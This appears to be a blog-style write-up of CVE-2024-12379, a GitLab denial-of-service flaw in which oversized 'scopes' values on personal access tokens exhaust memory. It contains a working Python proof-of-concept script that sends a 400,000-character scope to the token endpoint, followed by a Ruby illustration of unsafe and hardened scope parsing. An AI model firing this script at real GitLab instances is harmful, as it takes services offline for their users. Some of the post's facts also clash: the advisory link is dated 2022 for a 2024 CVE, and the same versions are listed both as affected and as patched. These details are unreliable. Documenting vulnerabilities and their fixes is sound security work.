A recently discovered denial of service (DoS) vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) allows an attacker to impact the availability of the GitLab instance. The vulnerability, identified as CVE-2024-12379, has been found to affect all GitLab CE/EE versions starting from 14.1 up to 17.6.5, 17.7 up to 17.7.4, and 17.8 up to 17.8.2. The issue lies in unbounded symbol creation through the scopes parameter in a Personal Access Token (PAT). This post delves into the details of the vulnerability, the code snippet triggering the issue, and the available exploit details.

Exploit Details

The primary issue leading to the DoS vulnerability in GitLab is the improper handling of the 'scopes' parameter within PATs. An attacker can take advantage of the unbounded symbol creation triggered through the scopes parameter to create an inordinate number of symbols. Consequently, this leads to memory exhaustion, rendering the GitLab instance unavailable.

Here is a simple code snippet showing how the vulnerability can be triggered:

#!/usr/bin/python3
import requests

# Placeholders: the instance URL and a valid PAT (the endpoint requires authentication)
TARGET_URL = "https://VULNERABLE_GITLAB_URL"
TOKEN = "USER_PERSONAL_ACCESS_TOKEN"
# Oversized scope value; the server converts the unvalidated string into a symbol
SCOPE = "a" * 400000

headers = {"Private-Token": TOKEN}

data = {
    "name": "Example DoS Token",
    "expires_at": "2024-10-26T13:00:00Z",
    "scopes[]": SCOPE
}

# Create a new PAT through the affected endpoint
response = requests.post(f"{TARGET_URL}/api/v4/personal_access_tokens", headers=headers, data=data)

print(response.status_code)
print(response.text)

In the code above, replace VULNERABLE_GITLAB_URL and USER_PERSONAL_ACCESS_TOKEN with the appropriate values. The script creates a new PAT using the vulnerable GitLab API. By setting the SCOPE variable to a very long string, the code snippet abuses the unbounded symbol creation vulnerability, leading to memory exhaustion and rendering the GitLab instance unresponsive.
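As an added illustration (not GitLab's own code), here is the server-side pattern behind this bug class in Ruby: interning caller-supplied scope strings as symbols before validating them, next to a hardened version that bounds the length and checks an allowlist first. The scope names and the length limit are assumptions made for this example.

```ruby
# Added illustration, not GitLab's code: unvalidated String#to_sym on
# request input next to a hardened parser that validates before interning.

# Assumed allowlist of PAT scope names for this example.
ALLOWED_SCOPES = %w[api read_api read_user read_repository write_repository].freeze
MAX_SCOPE_LENGTH = 64 # assumed bound; real scope names are far shorter

class InvalidScope < StandardError; end

# Unsafe: every caller-controlled string is interned unconditionally, so the
# caller decides how many symbols are created and how large each one is.
def unsafe_parse_scopes(raw_scopes)
  Array(raw_scopes).map { |s| s.to_s.to_sym }
end

# Hardened: bound the length and check membership against the fixed
# allowlist before converting, so only known, short names become symbols.
def safe_parse_scopes(raw_scopes)
  Array(raw_scopes).map do |s|
    s = s.to_s
    raise InvalidScope, "scope too long (#{s.length} chars)" if s.length > MAX_SCOPE_LENGTH
    raise InvalidScope, "unknown scope #{s.inspect}" unless ALLOWED_SCOPES.include?(s)
    s.to_sym
  end
end

# Policy check for a request's scopes[] values: the parsed symbols on
# success, :rejected when the hardened parser refuses the input.
def check_scopes(raw_scopes)
  safe_parse_scopes(raw_scopes)
rescue InvalidScope => e
  warn "rejected scopes[]: #{e.message}"
  :rejected
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: a legitimate request and one carrying a 400,000-char scope.
  p check_scopes(%w[api read_user]) # => [:api, :read_user]
  p check_scopes(["a" * 400_000])   # => :rejected (nothing interned)
end
```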

For more details about this vulnerability, refer to the following sources:

1. GitLab Security Advisory for CVE-2024-12379: https://about.gitlab.com/releases/2022/10/25/cve-2024-12379-gitlab-ce-ee-14.1-and-later-vulnerable-to-dos/
2. MITRE CVE Database - CVE-2024-12379: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12379
3. NVD - CVE-2024-12379: https://nvd.nist.gov/vuln/detail/CVE-2024-12379

The GitLab team has provided patches in the following releases to address the vulnerability:

1. GitLab CE/EE version 17.6.5
2. GitLab CE/EE version 17.7.4
3. GitLab CE/EE version 17.8.2

It is strongly recommended that users running affected GitLab versions update their installations to a patched version to mitigate the risks associated with this vulnerability.

Conclusion

CVE-2024-12379 is a DoS vulnerability that impacts the availability of GitLab CE/EE instances due to unbounded symbol creation in the scopes parameter of Personal Access Tokens. Users running affected versions should update their installations promptly to protect against potential attacks.

Timeline

Published on: 02/12/2025 15:15:12 UTC